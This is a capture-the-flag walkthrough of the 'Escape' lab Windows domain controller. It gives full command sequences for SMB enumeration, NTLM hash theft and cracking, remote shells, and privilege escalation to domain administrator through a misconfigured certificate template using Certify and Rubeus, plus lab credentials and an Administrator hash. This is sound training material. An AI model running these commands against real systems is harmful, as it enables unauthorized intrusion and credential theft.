# Escape ## Inital recon ### nmap `nmap -sC -sV 10.10.11.202 -Pn` ``` PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-28 11:18:13Z) 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2023-05-28T11:17:39 |_Not valid after: 2053-05-28T11:17:39 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h59m33s, deviation: 0s, median: 7h59m33s ``` ### SMB Let's check if there's any guest or anonymous access to the smbshare: `smbmap -u "" -p "" -P 445 -H 10.10.11.202 && smbmap -u "guest" -p "" -P 445 -H 10.10.11.202` Here we can see that there is a read only disk called `Public`, using `smbclient --no-pass //10.10.11.202/Public` we can see a file called `SQL Server Procedures.pdf`, so let's download it using `smbget smb://10.10.11.202/Public -R`, and we get some guest credentials. ``` PublicUser:GuestUserCantWrite1 ``` Following [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#steal-netntlm-hash-relay-attack) we are able to steal a hash using msfconsole and responder and then crack the hash using johntheripper `john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt` for the user `sql_svc`. ``` sql_svc:REGGIE1234ronnie ``` ## User.txt Next we can use rpcclient to do some enumeration: `rpcclient -U sql_svc 10.10.11.202` ``` rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[Tom.Henn] rid:[0x44f] user:[Brandon.Brown] rid:[0x450] user:[Ryan.Cooper] rid:[0x451] user:[sql_svc] rid:[0x452] user:[James.Roberts] rid:[0x453] user:[Nicole.Thompson] rid:[0x454] ``` ``` rpcclient $> enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] ``` ``` rpcclient $> enumprivs found 35 privileges SeCreateTokenPrivilege 0:2 (0x0:0x2) SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3) SeLockMemoryPrivilege 0:4 (0x0:0x4) SeIncreaseQuotaPrivilege 0:5 (0x0:0x5) SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTcbPrivilege 0:7 (0x0:0x7) SeSecurityPrivilege 0:8 (0x0:0x8) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeLoadDriverPrivilege 0:10 (0x0:0xa) SeSystemProfilePrivilege 0:11 (0x0:0xb) SeSystemtimePrivilege 0:12 (0x0:0xc) SeProfileSingleProcessPrivilege 0:13 (0x0:0xd) SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe) SeCreatePagefilePrivilege 0:15 (0x0:0xf) SeCreatePermanentPrivilege 0:16 (0x0:0x10) SeBackupPrivilege 0:17 (0x0:0x11) SeRestorePrivilege 0:18 (0x0:0x12) SeShutdownPrivilege 0:19 (0x0:0x13) SeDebugPrivilege 0:20 (0x0:0x14) SeAuditPrivilege 0:21 (0x0:0x15) SeSystemEnvironmentPrivilege 0:22 (0x0:0x16) SeChangeNotifyPrivilege 0:23 (0x0:0x17) SeRemoteShutdownPrivilege 0:24 (0x0:0x18) SeUndockPrivilege 0:25 (0x0:0x19) SeSyncAgentPrivilege 0:26 (0x0:0x1a) SeEnableDelegationPrivilege 0:27 (0x0:0x1b) SeManageVolumePrivilege 0:28 (0x0:0x1c) SeImpersonatePrivilege 0:29 (0x0:0x1d) SeCreateGlobalPrivilege 0:30 (0x0:0x1e) SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f) SeRelabelPrivilege 0:32 (0x0:0x20) SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21) SeTimeZonePrivilege 0:34 (0x0:0x22) SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23) SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24) ``` Next, let's use evil-winrm for a shell: `evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'` We can also upload and run winPEAS, but unfortunately nothing comes up. Further enumeration of the file system reveals that `C:\SQLserver\Logs` contains some credentials: ``` 2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. ``` So let's use those credentials with evil-winrm for another shell `evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'` `user.txt` can be found at `C:\Users\Ryan.Cooper\Desktop` ## Root.txt Let's upload Certify.exe to see if there is anything vulnerable certificate templates `./Certify.exe find /vulnerable /currentuser` ``` [!] Vulnerable Certificates Templates : CA Name : dc.sequel.htb\sequel-DC-CA Template Name : UserAuthentication Schema Version : 2 Validity Period : 10 years Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email Permissions Enrollment Permissions Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 Object Control Permissions Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 ``` [Following a guide on how to exploit this vulnerable template](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin) we can arrive at the following commands: 1. Run this on your target machine to get the certificate: `./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator` then copy the certificate to your attacking machine. 2. Run this on your attacking machine: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx` then upload `cert.pfx` to the target machine 3. Run this on the target machine: `./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials` then copy the NTLM hash 4. Run this on your attacking machine for a shell as Administrator: `evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE` `root.txt` can be found at `C:\Users\Administrator\Desktop`